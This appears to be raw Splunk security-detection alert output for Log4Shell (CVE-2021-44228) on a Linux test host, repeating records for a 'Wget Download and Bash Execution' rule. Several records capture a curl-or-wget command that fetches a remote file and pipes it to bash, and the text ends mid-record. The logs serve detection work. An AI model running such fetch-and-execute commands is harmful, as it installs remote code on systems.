annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", 
dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 
annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", 
annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", 
annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies 
the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint 
sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget 
https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", 
info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", 
annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint 
sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", 
info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 
annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642753, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Command and Control", annotations._all="PR.DS", annotations._all="CVE-2021-44228", annotations._all="CIS 12", annotations._all="PR.PT", annotations._all="DE.AE", annotations._all="T1059", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1190", annotations._all="CIS 13", annotations._all="Stage:Initial Access", annotations._all="Source:Endpoint", annotations._all="DE.CM", annotations._all="Actions 
